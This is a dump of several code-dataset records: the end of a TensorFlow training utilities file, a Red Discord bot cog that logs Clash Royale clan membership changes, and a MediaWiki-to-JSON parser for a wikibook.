lambda: tf.image.flip_left_right(stacked)\n false_fn = lambda: stacked\n stacked = tf.cond(tf.math.equal(flip, 1), true_fn, false_fn)\n\n # Unstack data\n data, coeff, mesh, soln = tf.unstack(stacked)\n \"\"\" \n return data, coeff, mesh, soln\n\n\n\n# Show all variables in current model\ndef show_variables():\n model_vars = tf.trainable_variables()\n slim.model_analyzer.analyze_vars(model_vars, print_info=True)\n \n# Create folders if they do not already exist\ndef checkFolders(dir_list):\n for dir in list(dir_list):\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n# Check that fulle MNIST dataset exists in specified directory\ndef checkData(data_dir):\n if not os.path.exists(data_dir):\n raise FileNotFoundError(\"Specified data directory '\" + data_dir + \"' does not exist in filesystem.\")\n elif not os.path.exists(os.path.join(data_dir,'Data')):\n raise FileNotFoundError(\"'Data' not found in data directory.\")\n elif not os.path.exists(os.path.join(data_dir,'Meshes')):\n raise FileNotFoundError(\"'Meshes' not found in data directory.\")\n elif not os.path.exists(os.path.join(data_dir,'Solutions')):\n raise FileNotFoundError(\"'Solutions' not found in data directory.\")\n\n# Copy model and flags files for logging\ndef backup_configs(model_dir):\n checkFolders([model_dir])\n for f in [\"main.py\", \"base_model.py\", \"utils.py\", \"flags.py\", \"convolution_layers.py\"]:\n copyfile(f, os.path.join(model_dir, f))\n if not os.path.exists(os.path.join(model_dir,\"Networks\")):\n copytree(\"Networks\", os.path.join(model_dir,\"Networks\"))\n\n\n# Add suffix to end of tensor name\ndef add_suffix(name, suffix):\n if suffix is not None:\n return name + suffix\n else:\n return name\n\n\n\n\n\n# Define early stopping hook\nclass EarlyStoppingHook(session_run_hook.SessionRunHook):\n def __init__(self, loss_name, feed_dict={}, tolerance=0.01, stopping_step=50, start_step=100):\n self.loss_name = loss_name\n self.feed_dict = feed_dict\n self.tolerance = tolerance\n self.stopping_step = stopping_step\n self.start_step = start_step\n\n # Initialize global and internal step counts\n def begin(self):\n self._global_step_tensor = 
training_util._get_or_create_global_step_read()\n        if self._global_step_tensor is None:\n            raise RuntimeError(\"Global step should be created to use EarlyStoppingHook.\")\n        self._prev_step = -1\n        self._step = 0\n\n    # Evaluate early stopping loss every `stopping_step` steps\n    # (avoiding repetition when multiple run calls are made each step)\n    def before_run(self, run_context):\n        if (self._step % self.stopping_step == 0) and \\\n           (not self._step == self._prev_step) and (self._step > self.start_step):\n\n            print(\"\\n[ Early Stopping Check ]\")\n\n            # Get graph from run_context session\n            graph = run_context.session.graph\n\n            # Retrieve loss tensor from graph\n            loss_tensor = graph.get_tensor_by_name(self.loss_name)\n\n            # Populate feed dictionary with placeholders and values\n            fd = {}\n            for key, value in self.feed_dict.items():\n                placeholder = graph.get_tensor_by_name(key)\n                fd[placeholder] = value\n\n            return session_run_hook.SessionRunArgs({'step': self._global_step_tensor,\n                                                    'loss': loss_tensor}, feed_dict=fd)\n        else:\n            return session_run_hook.SessionRunArgs({'step': self._global_step_tensor})\n\n    # Check if current loss is below tolerance for early stopping\n    def after_run(self, run_context, run_values):\n        if (self._step % self.stopping_step == 0) and \\\n           (not self._step == self._prev_step) and (self._step > self.start_step):\n            global_step = run_values.results['step']\n            current_loss = run_values.results['loss']\n            print(\"Current stopping loss = %.10f\\n\" %(current_loss))\n\n            if current_loss < self.tolerance:\n                print(\"[ Early Stopping Criterion Satisfied ]\\n\")\n                run_context.request_stop()\n            self._prev_step = global_step\n        else:\n            global_step = run_values.results['step']\n        self._step = global_step\n\n","sub_path":"Variable_Coefficient/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"232277758","text":"import logging\r\nfrom typing import Optional\r\n\r\nimport discord\r\nfrom redbot.core.bot import Red\r\nfrom redbot.core import Config, checks, commands\r\n\r\nlog = logging.getLogger(\"red.cogs.clanlog\")\r\n\r\n\r\nclass NoClansCog(Exception):\r\n    pass\r\n\r\n\r\nclass ClanLog(commands.Cog):\r\n    def __init__(self, bot: Red):\r\n        self.bot = bot\r\n\r\n        self.config = Config.get_conf(self, identifier=6942053)\r\n        default_global = {\r\n            \"global_log_channel\": None,\r\n        }\r\n        self.config.register_global(**default_global)\r\n\r\n        try:\r\n            # for auto-completion :)\r\n            from clashroyaleclansv2 import ClashRoyaleClans2\r\n            self.crclans: ClashRoyaleClans2 = self.bot.get_cog(\"ClashRoyaleClans2\")\r\n            if self.crclans is None:\r\n                log.error(\"Load clashroyaleclans cog for this cog to work.\")\r\n                raise NoClansCog\r\n        except Exception:\r\n            pass\r\n\r\n    @commands.Cog.listener(name=\"on_clandata_update\")\r\n    async def on_clandata_update(self, old_data, new_data):\r\n        def get_role_hierarchy(role):\r\n            hierarchy = {\"member\": 1, \"elder\": 2, \"coleader\": 3, \"leader\": 4}\r\n            if role.lower() not in hierarchy.keys():\r\n                log.error(f\"Cannot find hierarchy for role {role.lower() or 'None'}\")\r\n                return 0\r\n            return hierarchy[role.lower()]\r\n\r\n        log_channel_id = await self.config.global_log_channel()\r\n        log_channel = self.bot.get_channel(log_channel_id)\r\n        if log_channel is None:\r\n            log.error(\"Global log channel is not setup correctly.\")\r\n            return\r\n\r\n        # old_data = kwargs.get(\"old_data\")\r\n        # new_data = kwargs.get(\"new_data\")\r\n        # Check for None before calling len() to avoid a TypeError\r\n        if old_data is None or len(old_data) == 0:\r\n            log.error(\"Old data is %s\", old_data)\r\n            return\r\n        if new_data is None or len(new_data) == 0:\r\n            log.error(\"New data is %s\", new_data)\r\n            return\r\n        for key, data in new_data.items():\r\n            clan_log_channel = self.crclans.get_static_clandata(key).get(\"log_channel\", None)\r\n            if clan_log_channel:\r\n                clan_log_channel = self.bot.get_channel(clan_log_channel)\r\n\r\n            old_members_data = {}\r\n            new_members_data = {}\r\n            # When a clan is added\r\n            if key not in old_data.keys():\r\n                log.error(f\"Clan {key} not found in old_data.\")\r\n                continue\r\n            for member_data in old_data[key][\"member_list\"]:\r\n                old_members_data[member_data[\"tag\"]] = member_data\r\n            for member_data in data[\"member_list\"]:\r\n                new_members_data[member_data[\"tag\"]] = member_data\r\n\r\n            # Process promotions and demotions\r\n            common_members = set(old_members_data.keys()).intersection(new_members_data.keys())\r\n            description = \"\"\r\n            for member in common_members:\r\n                old_role = old_members_data[member].get(\"role\", \"\")\r\n                old_role_index = get_role_hierarchy(old_role)\r\n                new_role = new_members_data[member].get(\"role\", \"\")\r\n                new_role_index = get_role_hierarchy(new_role)\r\n                if old_role_index == new_role_index:\r\n                    continue\r\n                if old_role_index > new_role_index:\r\n                    description += f\"Demotion: {old_role} ⇒ {new_role}\\n\"\r\n                if old_role_index < new_role_index:\r\n                    description += f\"Promotion: {old_role} ⇒ {new_role}\\n\"\r\n                description += f\"{old_members_data[member]['name']} ({old_members_data[member]['tag']})\\n\"\r\n            if description:\r\n                embed = discord.Embed(\r\n                    title=f\"Member Edited {data['name']} ({data['tag']})\",\r\n                    description=description,\r\n                    colour=discord.Colour.blue(),\r\n                )\r\n                await log_channel.send(embed=embed)\r\n                if clan_log_channel:\r\n                    await clan_log_channel.send(embed=embed)\r\n\r\n            # Process members data\r\n            total = set(list(new_members_data.keys())).union(\r\n                set(list(old_members_data.keys()))\r\n            )\r\n            players_left_clan = set(total - set(new_members_data.keys()))\r\n            players_joined_clan = set(total - set(old_members_data.keys()))\r\n\r\n            description = \"\"\r\n            for player_tag in players_left_clan:\r\n                player_name = old_members_data.get(player_tag, {}).get(\"name\", \"Unnamed Player\")\r\n                sad_emote = self.bot.get_emoji(592001717311242241) or \"\"\r\n                description += \"{}({}) has left {} {}\\n\".format(\r\n                    player_name, player_tag, data[\"name\"], sad_emote\r\n                )\r\n            if description:\r\n                embed = discord.Embed(\r\n                    title=\"Member Left\",\r\n                    description=description,\r\n                    colour=discord.Colour.blue(),\r\n                )\r\n                await log_channel.send(embed=embed)\r\n                if clan_log_channel:\r\n                    await clan_log_channel.send(embed=embed)\r\n            description = \"\"\r\n            for player_tag in players_joined_clan:\r\n                player_name = new_members_data.get(player_tag, {}).get(\"name\", \"Unnamed Player\")\r\n                happy_emote = self.bot.get_emoji(375143193630605332) or \"\"\r\n                description += \"{}({}) has joined {} {}\\n\".format(\r\n                    player_name, player_tag, key, happy_emote\r\n                )\r\n            if description:\r\n                embed = discord.Embed(\r\n                    title=\"Member Joined\",\r\n                    description=description,\r\n                    colour=discord.Colour.blue(),\r\n                )\r\n                await log_channel.send(embed=embed)\r\n                if clan_log_channel:\r\n                    await clan_log_channel.send(embed=embed)\r\n\r\n    @commands.group(name=\"clanlogset\")\r\n    async def clanlogset(self, ctx):\r\n        pass\r\n\r\n    @clanlogset.command(name=\"global_log\")\r\n    @checks.is_owner()\r\n    async def clanlogset_global_log_channel(self, ctx, channel: Optional[discord.TextChannel] = None):\r\n        if channel is None:\r\n            await 
self.config.global_log_channel.set(channel)\r\n await ctx.send(\"Disabled global clanlog\")\r\n await ctx.tick()\r\n return\r\n await self.config.global_log_channel.set(channel.id)\r\n await ctx.send(\"Global clanlog channel has been set to {}\".format(channel.mention))\r\n await ctx.tick()\r\n","sub_path":"clanlog/clanlog.py","file_name":"clanlog.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139518643","text":"\"\"\"Module defining a parser for MediaWiki code.\"\"\"\n\nimport json\nimport re\nimport logging\n\nfrom collections import defaultdict\nfrom itertools import chain, count\nfrom html.parser import HTMLParser\nfrom mfnf.transformations import NodeTransformation, ChainedAction, Action, \\\n NodeTypeTransformation, check, NotInterested, Transformation, SectionTracking\nfrom mfnf.utils import lookup, remove_prefix, remove_suffix, merge, log_parser_error, resolve_usernames\n\nreport_logger = logging.getLogger(\"report_logger\")\n\nTEMPLATE_SPEC = {\n \"definition\": lambda x: x in [\"definition\"],\n \"beispiel\": lambda x: x in [\"beispiel\"],\n \"beweis\": lambda x: x in [\"beweis\"],\n \"alternativer beweis\": lambda x: x in [\"beweis\"],\n \"beweiszusammenfassung\": lambda x: x in [\"zusammenfassung\"],\n \"lösungsweg\": lambda x: x in [\"lösungsweg\"],\n \"lösung\": lambda x: x in [\"lösung\"],\n \"beweisschritt\": lambda x: x in [\"beweisschritt\"],\n \"warnung\": lambda x: x in [\"1\"],\n \"hinweis\": lambda x: x in [\"1\"],\n \"hauptartikel\": lambda x: x in [\"1\"],\n \"frage\": lambda x: x in [\"frage\", \"antwort\"],\n \"aufgabe\": lambda x: x in [\"aufgabe\", \"erklärung\", \"beispiel\",\n \"zusammenfassung\", \"lösung\", \"lösungsweg\",\n \"beweis\", \"beweis2\"],\n \"satz\": lambda x: x in [\"satz\", \"erklärung\", \"beispiel\",\n \"zusammenfassung\", \"lösung\", \"lösungsweg\",\n \"beweis\", \"beweis2\"],\n \"liste\": lambda x: x.startswith(\"item\") or x in [\"liste\"],\n # important paragraph\n \"-\": lambda x: x in [\"1\"],\n \"fallunterscheidung\": lambda x: x.startswith(\"beweis\"),\n \"vollständige induktion\": lambda x: x in [\"aussageform\", \"induktionsanfang\",\n \"induktionsvoraussetzung\", \"induktionsbehauptung\",\n \"beweis_induktionsschritt\", \"erfuellungsmenge\"],\n}\n\nTEMPLATE_INLINE_SPEC = {\n \"beweisschritt\": lambda x: x in [\"ziel\", \"name\"],\n \"fallunterscheidung\": lambda x: x.startswith(\"fall\"),\n \"formel\": lambda x: x in [\"1\"],\n \"definition\": lambda x: x in [\"titel\"],\n \"beispiel\": lambda x: x in [\"titel\"],\n \"lösungsweg\": lambda x: x in [\"titel\"],\n \"lösung\": lambda x: x in [\"titel\"],\n \"beweiszusammenfassung\": lambda x: x in [\"titel\"],\n \"alternativer beweis\": lambda x: x in [\"titel\"],\n \"beweis\": lambda x: x in [\"titel\"],\n \"satz\": lambda x: x in [\"titel\"],\n \"aufgabe\": lambda x: x in [\"titel\"],\n \"fg\": lambda x: x in [\"2\"]\n}\n\nTEMPLATE_LIST_PARAMS = {\n \"liste\": [\"item\"],\n \"fallunterscheidung\": [\"fall\", \"beweis\"]\n}\n\nBOXSPEC = [\n (\"definition\", \"definition\",\n {\"title\": \"titel\", \"definition\": \"definition\"}),\n\n (\"example\", \"beispiel\", {\"title\": \"titel\", \"example\": \"beispiel\"}),\n\n (\"solution\", \"lösung\", {\"title\": \"titel\", \"solution\": \"lösung\"}),\n\n (\"proofbycases\", \"fallunterscheidung\",\n {\"cases\": \"fall_list\", \"proofs\": \"beweis_list\"}),\n\n (\"solutionprocess\", \"lösungsweg\",\n {\"title\": \"titel\", 
\"solutionprocess\": \"lösungsweg\"}),\n\n (\"proofsummary\", \"beweiszusammenfassung\",\n {\"title\": \"titel\", \"proofsummary\": \"zusammenfassung\"}),\n\n (\"alternativeproof\", \"alternativer beweis\",\n {\"title\": \"titel\", \"alternativeproof\": \"beweis\"}),\n\n (\"proof\", \"beweis\", {\"title\": \"titel\", \"proof\": \"beweis\"}),\n\n (\"warning\", \"warnung\", {\"warning\": \"1\"}),\n\n (\"hint\", \"hinweis\", {\"hint\": \"1\"}),\n\n (\"coloredtext\", \"fg\", {\"color\": \"1\", \"content\": \"2\"}),\n\n (\"smiley\", \"smiley\", {\"name\": \"1\"}),\n\n (\"mainarticle\", \"hauptartikel\", {\"mainarticle\": \"1\"}),\n\n (\"question\", \"frage\",\n {\"question\": \"frage\", \"answer\": \"antwort\", \"questiontype\": \"typ\"}),\n\n (\"proofstep\", \"beweisschritt\",\n {\"name\": \"name\", \"target\": \"ziel\", \"proof\": \"beweisschritt\"}),\n\n (\"theorem\", \"satz\",\n {\"title\": \"titel\", \"theorem\": \"satz\", \"explanation\": \"erklärung\",\n \"example\": \"beispiel\", \"proofsummary\": \"zusammenfassung\",\n \"solution\": \"lösung\", \"solutionprocess\": \"lösungsweg\",\n \"proof\": \"beweis\", \"alternativeproof\": \"beweis2\"}),\n\n (\"exercise\", \"aufgabe\",\n {\"title\": \"titel\", \"exercise\": \"aufgabe\", \"explanation\": \"erklärung\",\n \"example\": \"beispiel\", \"proofsummary\": \"zusammenfassung\",\n \"solution\": \"lösung\", \"solutionprocess\": \"lösungsweg\",\n \"proof\": \"beweis\", \"alternativeproof\": \"beweis2\"}),\n\n (\"importantparagraph\", \"-\", {\"importantparagraph\": \"1\"}),\n (\"induction\", \"vollständige induktion\", {\"statement\": \"aussageform\", \"induction_start\": \"induktionsanfang\",\n \"induction_requirement\": \"induktionsvoraussetzung\", \"induction_goal\": \"induktionsbehauptung\",\n \"induction_step\": \"beweis_induktionsschritt\", \"baseset\": \"erfuellungsmenge\"})\n]\n\nDEFAULT_VALUES = {\n \"proofstep\": {\n \"name\": [{\"type\": \"text\", \"data\": \"Beweisschritt\"}]\n },\n \"smiley\": {\n \"name\": \":)\"\n }\n}\n\n\n# List of all HTML inline elements\n# see https://developer.mozilla.org/en-US/docs/Web/HTML/Inline_elements\nHTML_INLINE_ELEMENTS = [\n \"a\", \"b\", \"big\", \"i\", \"small\", \"tt\", \"abbr\", \"acronym\", \"cite\", \"code\",\n \"dfn\", \"em\", \"kbd\", \"strong\", \"samp\", \"time\", \"var\", \"bdo\", \"br\", \"img\",\n \"map\", \"object\", \"q\", \"script\", \"span\", \"sub\", \"sup\", \"button\", \"input\",\n \"label\", \"select\", \"textarea\"\n]\n\ndef canonical_image_name(name):\n name = remove_prefix(name, \"./\")\n name = remove_prefix(name, \"Datei:\")\n name = remove_prefix(name, \"File:\")\n\n return \"File:\" + name\n\ndef parse_content(api, title, text):\n \"\"\"Parse MediaWiki code `text`.\"\"\"\n return MediaWikiCodeParser(api=api, title=title)(text)\n\ndef parse_inline(api, title, text):\n \"\"\"Parse MediaWiki code `text` in inline mode.\"\"\"\n content = MediaWikiCodeParser(api=api, title=title)(text)\n\n assert len(content) == 1, text\n assert content[0][\"type\"] == \"element\", \"{} in {} yields {}\".format(text, title, content)\n assert content[0][\"name\"] == \"p\", \"{} in {} yields {}\".format(text, title, content)\n\n return content[0][\"children\"]\n\ndef text_rstrip(content):\n \"\"\"Applies `rstrip()` to parsed MediaWiki content.\"\"\"\n try:\n return content[:-1] + [{\"type\": \"text\",\n \"data\": content[-1][\"data\"].rstrip()}]\n except (IndexError, KeyError):\n return content\n\nclass HTML2JSONParser(HTMLParser):\n \"\"\"Parser for converting HTML to JSON.\"\"\"\n\n def 
__init__(self):\n super(HTML2JSONParser, self).__init__()\n\n self._node_stack = []\n self.content = []\n\n def _append(self, node):\n if self._node_stack:\n self._node_stack[-1][\"children\"].append(node)\n else:\n self.content.append(node)\n\n def handle_starttag(self, tag, attrs):\n node = {\"type\": \"element\", \"name\": tag,\n \"attrs\": dict(attrs),\n \"children\": []}\n\n self._append(node)\n self._node_stack.append(node)\n\n def handle_endtag(self, tag):\n assert self._node_stack\n assert self._node_stack[-1][\"name\"] == tag, \\\n \"end tag should be {}, but is {}. last nodes: {}\" \\\n .format(tag, self._node_stack[-1][\"name\"], self._node_stack)\n\n self._node_stack.pop()\n\n def handle_data(self, data):\n self._append({\"type\": \"text\", \"data\": data})\n\n def error(self, message):\n raise AssertionError(message)\n\nclass MediaWikiCodeParser(ChainedAction):\n \"\"\"Parses MediaWikiCode and restore template definitions.\"\"\"\n\n class MediaWikiCode2HTML(Action):\n \"\"\"Converts MediaWiki code to HTML\"\"\"\n\n def __call__(self, text):\n return self.api.convert_text_to_html(self.title, text)\n\n class MediaWikiCodeHTML2JSON(Action):\n \"\"\"Converts HTML of a MediaWiki document to JSON.\"\"\"\n\n def __call__(self, text):\n parser = HTML2JSONParser()\n\n parser.feed(text)\n\n return parser.content\n\n class RemoveUnicodeFallback(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\").of((\"span\", ))\n check(obj, \"attrs\", \"typeof\") == \"mw:FallbackId\"\n return None\n\n class CollapseWhitespaces(Transformation):\n def change_inline(self, obj, i, n):\n if lookup(obj, \"type\") == \"text\":\n data = re.sub(r\"\\s+(?=\\s)\", \"\", obj[\"data\"])\n data = re.sub(r\"\\s\", \" \", data)\n if \"\\n\" in data:\n print(repr(data))\n\n if i == 0:\n data = data.lstrip()\n\n if i == n-1:\n data = data.rstrip()\n\n if data:\n return merge(obj, {\"data\": data})\n else:\n return None\n else:\n return self(obj)\n\n def change_block(self, obj, i, n):\n result = self.change_inline(obj, i, n)\n\n if lookup(result, \"data\") == \" \":\n return None\n else:\n return result\n\n def act_on_list(self, lst):\n if any((lookup(x, \"name\") in HTML_INLINE_ELEMENTS for x in lst)):\n func = self.change_inline\n else:\n func = self.change_block\n\n # Necessary because the header includes a because of\n # calling {{DISPLAYTITLE:...}} which should not happen. 
This\n # triggers that the root content is handled as inline mode which\n # should not happen.\n # TODO: Find a better solution\n if any((lookup(x, \"name\") == \"p\" for x in lst)):\n func = self.change_block\n\n result = (func(x, i, len(lst)) for x, i in zip(lst, count()))\n result = [x for x in result if x is not None]\n\n return result\n\n class TemplateDeinclusion(NodeTypeTransformation):\n \"\"\"Replaces included MediaWiki templates with template\n specification.\"\"\"\n\n def __init__(self, **options):\n super().__init__(**options)\n\n self._template_ids = set()\n\n def parse_parameter_value(self, name, param_key, param_value):\n \"\"\"Parses `param_value` in case `param_key` is a content\n parameter.\"\"\"\n\n if not param_value:\n # Empty strings shall be interpreted as None\n return None\n elif name in TEMPLATE_SPEC and TEMPLATE_SPEC[name](param_key):\n return parse_content(self.api, self.title, param_value)\n elif name in TEMPLATE_INLINE_SPEC \\\n and TEMPLATE_INLINE_SPEC[name](param_key):\n return parse_inline(self.api, self.title, param_value)\n else:\n return param_value\n\n def transform_element(self, obj):\n if lookup(obj, \"attrs\", \"about\") in self._template_ids:\n return None\n\n check(obj, \"attrs\", \"typeof\").of([\"mw:Transclusion\",\n \"mw:Transclusion mw:Video/Thumb\",\n \"mw:Transclusion mw:Image\"])\n\n template = json.loads(obj[\"attrs\"][\"data-mw\"])[\"parts\"][0]\n\n try:\n template = template[\"template\"]\n except (TypeError, KeyError):\n return {\"type\": \"error\",\n \"message\": \"Template spans over several HTML elements.\"}\n\n name = template[\"target\"][\"wt\"].strip()\n\n # labeled section transclusion needs unchanged case.\n if not name.startswith(\"#lst:\"):\n name = name.lower()\n\n if name != \"(!\":\n # Template includes a table afterwards\n self._template_ids.add(obj[\"attrs\"][\"about\"])\n\n name = remove_prefix(name, \":mathe für nicht-freaks: vorlage:\")\n\n params = template[\"params\"]\n params = {k: v[\"wt\"] for k, v in params.items()}\n params = {key: self.parse_parameter_value(name, key, value) \\\n for key, value in params.items()\n if not params.get(key + \"-noprint\", False)}\n\n # TODO: Find better solution\n if params.get(\"noprint\", False):\n return None\n\n return {\"type\": \"template\", \"name\": name, \"params\": params}\n\n class HandleLabeledTranscludedSections(NodeTypeTransformation):\n def transform_template(self, obj):\n if obj[\"name\"].startswith(\"#lst:\"):\n article_name = remove_prefix(obj[\"name\"], \"#lst:\")\n article = self.api.get_content(article_name)\n\n section_name = obj[\"params\"][\"1\"]\n begin = r\"\\\"\n end = r\"\\\"\n\n section = re.search(begin + \"(.*)\" + end, article, re.DOTALL)\n\n if section:\n section = section.group(1).strip()\n content = parse_content(self.api, self.title, section)\n\n return {\"type\": \"included_section\", \"content\": content}\n else:\n message = \"section '{}' of '{}' cannot be included\" \\\n .format(section_name, article_name)\n\n return {\"type\": \"error\", \"message\": message}\n else:\n raise NotInterested()\n\n class HandleGalleries(SectionTracking):\n def parse_gallery_item(self, text):\n try:\n name, caption = text.split(\"|\", 1)\n except ValueError:\n message = \"Gallery item needs a caption\"\n log_parser_error(message, text, position=self.current_section)\n return {\"type\": \"error\",\n \"message\": message}\n\n caption = parse_inline(self.api, self.title, caption.strip())\n license = self.api.get_image_license(name)\n\n return {\"type\": 
\"galleryitem\", \"caption\": caption,\n \"name\": canonical_image_name(name), \"license\": license}\n\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\") == \"ul\"\n check(obj, \"attrs\", \"typeof\") == \"mw:Extension/gallery\"\n\n data_mw = json.loads(obj[\"attrs\"][\"data-mw\"])\n spec = data_mw[\"body\"][\"extsrc\"].strip()\n items = [self.parse_gallery_item(x) for x in spec.splitlines()]\n\n return {\"type\": \"gallery\",\n \"widths\": int(data_mw[\"attrs\"].get(\"widths\", 120)),\n \"heights\": int(data_mw[\"attrs\"].get(\"heights\", 120)),\n \"items\": items}\n\nclass ArticleContentParser(ChainedAction):\n class MediaWikiCode2HTML(Action):\n def __call__(self, text):\n return parse_content(self.api, self.title, text)\n\n class MergeListParametersInTemplates(NodeTypeTransformation):\n def transform_template(self, obj):\n if obj[\"name\"] in TEMPLATE_LIST_PARAMS:\n params = obj[\"params\"].copy()\n\n for param_prefix in TEMPLATE_LIST_PARAMS[obj[\"name\"]]:\n result = []\n\n for n in count(1):\n try:\n result.append(params.pop(param_prefix + str(n)))\n except KeyError:\n break\n\n params[param_prefix + \"_list\"] = result\n\n return merge(obj, {\"params\": params})\n else:\n raise NotInterested()\n\n class RemoveReferences(NodeTypeTransformation):\n # TODO: We need a better implementation\n def transform_element(self, obj):\n if lookup(obj, \"attrs\", \"typeof\") in (\"mw:Extension/ref\",\n \"mw:Extension/references\"):\n # TODO: Proper parsing of references\n return None\n else:\n raise NotInterested()\n\n class HandleLists(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\").of((\"ul\", \"ol\"))\n\n items = [{\"type\": \"listitem\",\n \"content\": self(li[\"children\"])}\n for li in obj[\"children\"]]\n\n return {\"type\": \"list\",\n \"ordered\": obj[\"name\"] == \"ol\",\n \"items\": items}\n\n class HandleDefinitionLists(SectionTracking):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\") == \"dl\"\n\n items = [{\"type\": \"definitionlistitem\",\n \"definition\": self(dt[\"children\"]),\n \"explanation\": self(dd[\"children\"])}\n for dt, dd in zip(obj[\"children\"][::2],\n obj[\"children\"][1::2])]\n\n if not items:\n message = \"A definition list must not be empty!\"\n log_parser_error(message, obj, position=self.current_section)\n return {\"type\": \"error\",\n \"message\": message}\n\n return {\"type\": \"definitionlist\",\n \"items\": items}\n\n class HandleFigures(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\").of((\"figure\", \"span\", \"figure-inline\"))\n check(obj, \"attrs\", \"typeof\").of((\"mw:Image\", \"mw:Image/Thumb\"))\n\n caption = [child\n for child in obj[\"children\"]\n if child[\"name\"] == \"figcaption\"]\n try:\n caption = caption[0][\"children\"]\n except IndexError:\n caption = []\n\n img = obj[\"children\"][0][\"children\"][0]\n name = canonical_image_name(img[\"attrs\"][\"resource\"])\n license = self.api.get_image_license(name)\n\n return {\"type\": \"image\", \"caption\": self(caption), \"name\": name,\n \"thumbnail\": obj[\"attrs\"][\"typeof\"] == \"mw:Image/Thumb\",\n \"inline\": obj[\"name\"] in (\"span\", \"figure-inline\"),\n \"license\": license,\n \"noprint\": \"noprint\" in obj[\"attrs\"].get(\"class\", \"\")}\n\n class HandleInlineFigures(SectionTracking):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n 
check(obj, \"name\") == \"span\"\n check(obj, \"attrs\", \"typeof\") == \"mw:Image\"\n\n message = \"Inline images are not allowed\"\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message}\n\n class HandleTable(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"type\") == \"element\"\n check(obj, \"name\") == \"table\"\n\n content = obj[\"children\"]\n\n if lookup(content, 0, \"name\") == \"tbody\":\n content = content[0][\"children\"]\n\n return {\"type\": \"table\", \"content\": self(content)}\n\n class ConvertInlineMath(NodeTransformation):\n def transform_dict(self, obj):\n check(obj, \"attrs\", \"typeof\") == \"mw:Extension/math\"\n\n formula = json.loads(obj[\"attrs\"][\"data-mw\"])[\"body\"][\"extsrc\"]\n\n return {\"type\": \"inlinemath\", \"formula\": formula.strip()}\n\n class FixNodeTypes(NodeTypeTransformation, SectionTracking):\n def transform_element(self, obj):\n if obj[\"name\"] == \"p\":\n return {\"type\": \"paragraph\", \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] == \"br\":\n message = \"
not allowed\"\n log_parser_error(message, obj, position=self.current_section)\n return {\"type\": \"error\", \"message\": message}\n elif obj[\"name\"] == \"dfn\":\n return {\"type\": \"i\", \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] in (\"i\", \"b\", \"th\", \"tr\", \"td\"):\n return {\"type\": obj[\"name\"], \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] in (\"h2\", \"h3\"):\n return {\"type\": \"header\",\n # Header begin with h2 in our project -> subtract 1\n \"depth\": int(obj[\"name\"][-1])-1,\n \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] == \"a\":\n url = obj[\"attrs\"].get(\"href\", \"\")\n\n if url:\n if url.startswith(\"./\"):\n # TODO: The URL prefix should not be hardcoded here\n url = \"https://de.wikibooks.org/wiki/\" + url[2:]\n\n assert url.startswith(\"http://\") \\\n or url.startswith(\"https://\")\n\n return {\"type\": \"href\", \"url\": url,\n \"content\": self(obj[\"children\"])}\n else:\n message = \" tag without `href` url\"\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message}\n elif obj[\"name\"] == \"del\":\n return {\"type\": \"strikethrough\", \"content\": self(obj[\"children\"])}\n elif obj[\"name\"] == \"blockquote\":\n return {\"type\": \"blockquote\", \"content\": self(obj[\"children\"])}\n\n elif lookup(obj, \"attrs\", \"typeof\") == \"mw:Video/Thumb\":\n # TODO: Proper parsing of videos\n return None\n elif lookup(obj, \"attrs\", \"typeof\") == \"mw:Extension/section\":\n data = json.loads(obj[\"attrs\"][\"data-mw\"])\n\n assert data[\"name\"] == \"section\"\n\n if \"begin\" in data[\"attrs\"]:\n return {\"type\": \"section_start\",\n \"name\": data[\"attrs\"][\"begin\"]}\n elif \"end\" in data[\"attrs\"]:\n return {\"type\": \"section_end\",\n \"name\": data[\"attrs\"][\"end\"]}\n else:\n return {\"type\": \"error\",\n \"message\": \"section must be either start or end.\"}\n elif obj[\"name\"] in (\"h1\", \"h4\", \"h5\", \"h6\"):\n message = \"Heading of depth {} is not allowed\".format(obj[\"name\"][1:])\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"error\",\n \"message\": message.format(int(obj[\"name\"][-1]))}\n elif lookup(obj, \"attrs\", \"typeof\") == \"mw:Entity\":\n # TODO: Are there other entities?\n return {\"type\": \"entity\", \"kind\": \" \"}\n elif (obj[\"name\"] == \"span\" and\n lookup(obj, \"attrs\", \"typeof\") == \"mw:DisplaySpace mw:Placeholder\"):\n msg = \"Spans with type {} are not allowed\".format(lookup(obj,\n \"attrs\",\n \"typeof\"))\n log_parser_error(msg, obj, position=self.current_section)\n return {\"type\": \"error\", \"message\": msg}\n else:\n message = \"Parsing of HTML element `{}`\".format(obj[\"name\"])\n log_parser_error(message, obj, position=self.current_section)\n\n return {\"type\": \"notimplemented\",\n \"message\": message,\n \"target\": obj}\n\n class HandleHeadingAnchors(NodeTypeTransformation):\n def transform_header(self, obj):\n check(obj, \"content\", -1, \"type\") == \"template\"\n check(obj, \"content\", -1, \"name\") == \"anker\"\n\n heading = text_rstrip(obj[\"content\"][:-1])\n anchor = obj[\"content\"][-1][\"params\"][\"1\"]\n\n return merge(obj, {\"content\": heading, \"anchor\": anchor})\n\n class HandleTemplates(NodeTypeTransformation, SectionTracking):\n def transform_template(self, obj):\n for bname, tname, param_names in BOXSPEC:\n if obj[\"name\"] == tname:\n params = {k: self(obj[\"params\"].get(v, None))\n for k, v in 
